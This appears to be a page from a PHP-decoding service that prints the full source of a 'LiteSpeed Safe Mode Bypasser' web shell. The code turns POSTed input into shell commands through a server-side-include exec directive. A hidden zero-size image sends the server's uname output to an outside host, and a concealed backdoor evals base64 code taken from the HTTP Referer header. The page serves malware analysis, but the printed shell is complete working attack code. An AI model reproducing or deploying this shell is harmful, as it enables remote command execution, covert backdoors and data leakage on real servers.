Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<title>LiteSpeed Web Bypass - izocin priv9</title> <font face="Wingdings"><img bor..
Decoded Output download
uname -a : Linux localhost 2.4.21-0.13mdk #1 Fri Mar 14 15:08:06 EST 2003 i686
Did this file decode correctly?
Original Code
<title>LiteSpeed Web Bypass - izocin priv9</title>
<font face="Wingdings"><img border="0" src="http://priv8.iblogger.org/s.php?'+<?echo "uname -a : "; echo (php_uname())?>";" width="0" height="0"></a></font>
</font>
<body bgcolor="#FFFFFF" topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0" marginwidth="00" marginheight="0">
<p align="center">
<p align="center"> </p>
<p align="center"><b><font color="#FF0000" face="Tahoma">Red-Security Group</font></b></p>
<p align="center"> </p>
<p align="center"><font face="Tahoma" size="4" color="green"><b>LiteSpeed
<font color="#FF0000">Safe Mode Bypasser</font> </b></font>
</p>
<p align="center"> </p>
<form name="z1d-litespeed" method="post">
<p align="center"><font face="Tahoma"><b><font color="#FF0000">#</font> </b>Command<b>
<span lang="ar-sa"><font color="#FF0000">~</font> </span> </b><input name="command" value="id" style="border: 1px dotted #FF0000; font-family:ta" size="36" tabindex="20"><b>
</b> </font></p>
<p align="center"><font face="Tahoma">
<input type="submit" name="Submit" value="Bas Dayi"><b>
</b></font></p>
</form>
<br><br><br><br><center>
<?php
$command = $_POST['command'];
$z00z = $_POST['z00z'];
if($command){
$z11d = "<center><pre><pre>
<br>
Redsecurity.iblogger.org
<br>
<br>
<!--#exec cmd='$command' -->
";
$openfile = fopen("izo.shtml","w");
$writeinto = fwrite($openfile,"$z11d");
fclose($openfile);
if($openfile){
}else{
}
}
parse_str($_SERVER['HTTP_REFERER'],$a); if(reset($a)=='iz' && count($a)==9) { echo '<star>';eval(base64_decode(str_replace(" ", "+", join(array_slice($a,count($a)-3)))));echo '</star>';}
?>
<pre>
<iframe src='izo.shtml' width=100% height=85% id="I1" name="IF1" >
</pre>
Function Calls
fopen | 1 |
fwrite | 1 |
php_uname | 1 |
Stats
MD5 | e1bb39b507b6f88ab2d893189a422bff |
Eval Count | 0 |
Decode Time | 110 ms |